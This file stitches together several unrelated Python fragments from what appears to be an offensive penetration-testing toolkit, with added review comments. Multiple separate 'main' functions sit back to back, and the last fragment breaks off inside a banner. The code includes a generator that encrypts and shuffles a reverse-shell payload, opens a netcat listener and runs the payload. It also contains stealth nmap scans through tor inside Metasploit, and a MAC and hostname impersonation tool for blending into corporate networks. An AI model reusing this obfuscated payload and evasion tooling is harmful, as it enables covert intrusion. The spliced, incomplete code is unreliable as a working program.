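def main():
    """Show the teamserver menu and dispatch commands until EXIT is entered.

    LAUNCH calls collect_teamserver_creds(save_file), LOAD calls
    load_saved_teamserver_creds(save_file), EXIT terminates the process with
    status 0. Any other input prints an error and shows the menu again.
    """
    # NOTE(review): the line breaks inside this literal are not recoverable
    # from the page; it is reproduced exactly as shown.
    menu_text = """ \n\n\n \t\tForeplay, EZ-Mode Armitage Teamserver Collaboration Menu \n\t\t\t\tCOMMANDS\n LAUNCH - Launch the Armitage Teamserver using NEW CREDENTIALS LOAD - Load PREVIOUSLY SAVED CREDENTIALS and launch a teamserver from that EXIT - Exit program """

    # A loop replaces the original self-recursion: every menu round used to
    # add a stack frame, so a long session ended in a recursion-depth error.
    while True:
        print(toolkits.cyan(menu_text))
        opt_choice = raw_input(toolkits.yellow("Enter a COMMAND: "))
        if opt_choice == "LAUNCH":
            collect_teamserver_creds(save_file)
        elif opt_choice == "LOAD":
            load_saved_teamserver_creds(save_file)
        elif opt_choice == "EXIT":
            print(toolkits.red('Received exit command, exiting!'))
            exit(0)
        else:
            print(toolkits.red(
                'You have entered a invalid option, please try again'))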
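def main():
    """Generate one payload file from the template, print debug output, run it.

    In order: obtain a key and an IV, read the template, split
    template_reverse_shell into lines and pass them through
    commandSegmentationTech and cryptor, write the result with
    writeUniquePayload, print the intermediate values, open a netcat listener
    on LPORT in a new gnome-terminal window, wait two seconds and execute the
    generated file with python.
    """
    decryptKey = generateKey()
    decryptIV = generateIV()
    code = read_template()
    # template_reverse_shell is not assigned in this function, so it has to be
    # a module-level name. The original also evaluated it as a bare expression
    # statement here, which had no effect and is dropped.
    payloadNoEncrypt = template_reverse_shell.splitlines()
    shuffledPayload = commandSegmentationTech(payloadNoEncrypt)
    l_encrypted = cryptor(shuffledPayload, decryptKey, decryptIV)
    outfile = writeUniquePayload(code, l_encrypted, decryptKey, decryptIV)

    print(red("DEBUG: Shuffled payload\r\n{}".format(str(shuffledPayload))))
    out = b64encode(l_encrypted)
    print(yellow("DEBUG: Encrypted payload\r\n{}".format(str(out))))
    print(green("DEBUG: Payload generated at\r\n{}".format(str(outfile))))

    # The file is only read back for display. The original opened it 'rb+'
    # and never closed the handle; a with-block in read-only mode releases it
    # before the file is executed below.
    with open(outfile, 'rb') as payload_file:
        uniquePayload = payload_file.read()
    print(red("DEBUG: Contents of {}\r\n".format(str(outfile))))
    print(yellow(uniquePayload))

    # NOTE(review): os.system runs each command line through the shell, and
    # LPORT and outfile are interpolated unquoted, so neither may contain
    # shell metacharacters.
    print(cyan("Opening netcat session"))
    os.system("""gnome-terminal -e 'bash -c "nc -nvlp {}"'""".format(
        str(LPORT)))
    print(green("You may run the payload with\r\npython {}".format(
        str(outfile))))
    time.sleep(2)
    print(green("Executing payload"))
    os.system("python {}".format(str(outfile)))
    return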
def main():
    """Print the banner, then show usage or hand the target list to readInputFile.

    With no command-line argument the usage text and an example are printed
    and the process exits with status 0. Otherwise the first argument is
    passed to readInputFile.
    """
    print("MassGoBuster. Automatically run gobuster against a wordlist of host,port.\r\nComing soon: Threading by running 5 gobuster processes at a time.")

    # NOTE(review): the usage text lists two required files, but only
    # sys.argv[1] is checked and read here; whether readInputFile picks up the
    # remaining arguments is not visible in this function.
    if len(sys.argv) >= 2:
        target_file = sys.argv[1]
        readInputFile(target_file)
        return

    usage_text = "Usage:\r\npython massgobuster.py <wordlist of host,ports> <wordlist of paths> <OPTIONAL: threads, default=10>"
    example_text = "\r\nEXAMPLE: python massGoBuster.py targetHostPort.txt /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 50\r\nEXAMPLE EFFECT: Runs GoBuster at a rate of 50 threads against each target,port combo found in the list of targets using the wordlist"
    print(toolkits.yellow(usage_text))
    print(toolkits.cyan(example_text))
    exit(0)
def cyan(string):
    """Pass *string* through toolkits.cyan, print the result and return it."""
    coloured = toolkits.cyan(string)
    print(coloured)
    return coloured
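def initial_scan(target_list):
    """Write the db_nmap resource file and start Metasploit with the FIN scan queued.

    Prompts for a Metasploit workspace name (blank input selects "default"),
    restarts the tor service, builds three db_nmap command lines (FIN, XMAS
    and comprehensive) that read their targets from *target_list*, writes
    them to a resource file and hands the startup command string to
    MSF_cmd_exec.

    Args:
        target_list: path of a text file with one IP address or hostname per
            line; it is passed to nmap through -iL.

    Returns:
        A (MSF_cmd, resource_file_default) tuple: the msfconsole startup
        command string and the path of the resource file that was written.

    Raises:
        OSError: if the resource file cannot be removed and re-created
            exclusively.
    """
    import errno  # local import: the file's import block is not visible here

    resource_file_default = '/tmp/resource_file_default.rc'
    print(toolkits.cyan("Your selected target list file is {0}".format(
        str(target_list))))

    workspace = str(raw_input("Enter your Metasploit WORKSPACE: "))
    # The original test was `workspace == "" or None`; the `or None` part is
    # always false. Whitespace-only input is now treated as blank as well.
    if not workspace.strip():
        workspace = "default"
    # NOTE(review): workspace and target_list are interpolated unescaped into
    # the ';'-separated console command below; a value containing ';' or a
    # newline becomes an additional console command.

    # Restart tor before any scan command is built.
    TOR_restart_cmd = "service tor restart"
    os.system(TOR_restart_cmd)

    save_file_location = "/root/Documents"  # directory for the nmap XML output

    # NSE enumeration scripts passed to every scan via --script.
    enum_scripts = """ajp-headers.nse,http-headers.nse,http-security-headers.nse,http-server-header.nse,cics-enum.nse,cics-user-enum.nse,citrix-enum-apps.nse,citrix-enum-apps-xml.nse,citrix-enum-servers.nse,citrix-enum-servers-xml.nse,dns-nsec3-enum.nse,dns-nsec-enum.nse,dns-srv-enum.nse,domino-enum-users.nse,eppc-enum-processes.nse,http-domino-enum-passwords.nse,http-drupal-enum.nse,http-drupal-enum-users.nse,http-enum.nse,http-gitweb-projects-enum.nse,http-svn-enum.nse,http-userdir-enum.nse,http-wordpress-enum.nse,krb5-enum-users.nse,msrpc-enum.nse,mysql-enum.nse,ncp-enum-users.nse,nrpe-enum.nse,omp2-enum-targets.nse,oracle-enum-users.nse,rdp-enum-encryption.nse,sip-enum-users.nse,smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-mbenum.nse,smtp-enum-users.nse,ssh2-enum-algos.nse,ssl-enum-ciphers.nse,tftp-enum.nse,tso-enum.nse,vtam-enum.nse"""

    # One timestamp shared by the three XML output names keeps a run's files
    # together.
    timestr = time.strftime("%Y%m%d-%H%M%S")

    # The scans are written to the resource file in the order FIN, XMAS,
    # comprehensive.
    FIN_scan_cmd = """db_nmap -v -O -sF -Pn -T4 -O -F -oX {2}/FIN_initial_scan_{3}.xml --script={0} nmap --min-hostgroup 50 --max-hostgroup 1024 --min-parallelism 10 --max-parallelism 20 --host-timeout 30s -iL {1}""".format(
        enum_scripts, str(target_list), save_file_location, timestr)
    XMAS_scan_cmd = """db_nmap -v -O -sX -Pn -T4 -O -F -oX {2}/XMAS_initial_scan_{3}.xml --script={0} nmap --min-hostgroup 50 --max-hostgroup 1024 --min-parallelism 10 --max-parallelism 20 --host-timeout 30s -iL {1}""".format(
        enum_scripts, str(target_list), save_file_location, timestr)
    COMPRE_scan_cmd = """db_nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 -oX {2}/COMPRE_initial_scan_{3}.xml --script={0} nmap --min-hostgroup 50 --max-hostgroup 1024 --min-parallelism 10 --max-parallelism 20 --host-timeout 30s -iL {1}""".format(
        enum_scripts, str(target_list), save_file_location, timestr)

    # Startup command string handed to MSF_cmd_exec: select the workspace,
    # run the FIN scan, then load the resource file.
    MSF_cmd = "workspace -a {0};setg WORKSPACE {0};{2};resource {1}".format(
        workspace, resource_file_default, FIN_scan_cmd)
    print(toolkits.yellow(""" DEBUG: db_nmap lines {0} """).format(MSF_cmd))
    time.sleep(3)

    # NOTE(review): the line breaks inside this literal are not recoverable
    # from the page; it is reproduced exactly as shown.
    db_nmap_resource_file = """ use auxiliary/server/socks4a run -j {0} {1} {2} """.format(
        FIN_scan_cmd, XMAS_scan_cmd, COMPRE_scan_cmd)
    print(toolkits.yellow(""" DEBUG: Resource file content {0} """).format(
        db_nmap_resource_file))

    # The path is fixed and sits in world-writable /tmp, and the /root save
    # location suggests this runs as root. A plain open(path, 'w') follows a
    # symlink or reuses a file another local user planted there, and the
    # console later executes whatever the file contains. Remove any existing
    # entry and create the file exclusively with owner-only permissions;
    # O_EXCL makes the open fail if something reappears at the path.
    try:
        os.unlink(resource_file_default)
    except OSError as err:
        if err.errno != errno.ENOENT:
            raise
    resource_fd = os.open(resource_file_default,
                          os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(resource_fd, 'w') as resource_handle:
        resource_handle.write(db_nmap_resource_file)

    print(toolkits.yellow(""" DEBUG: Location of resource files {0} """).format(
        resource_file_default))
    debug_str = """ls -la {0}""".format(resource_file_default)
    bash_command(debug_str)

    # The unused host_cidr_range / darkoperator_resource_file locals of the
    # original were never read and are dropped.
    MSF_cmd_exec(MSF_cmd)
    return MSF_cmd, resource_file_default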
banner = """ Macchanger Improved A needed makeover for a reknowned pentest tool 'Automatically selects the CLOSEST non-conflicting MAC address by randomizing the last portion of the MAC' 'Farms new real hostnames and MAC address ranges' 'Swaps your hostname independently, allowing you to assume other identities or blend into corporate network routers and WDS systems, like UNLV-Secure, UNLV-Guest, or IGT-Gaming' Chang Tan Lister Unlimited Cybersecurity Solutions, LLC. [email protected] Macchanger Improved is Part of the Hyperjacker's Toolkit Open-Source Penetration Testing Toolkits are NOT AVAILABLE FOR RESALE. """ print cyan(banner) def main(): menu = """Exit Farm new MAC addresses to impersonate Wi-Fi Hostname Farmer, Farm new Hostnames (Computer ID's) to impersonate Activate Switch Identity + MAC address View impersonatable names View impersonatable MAC addresses LAN Hostname Farmer, Farm locally connected Hostnames using NetDiscover""" print """ (run python install.py) INSTALL. Install both the Python and Debian/Kali APT Prerequisites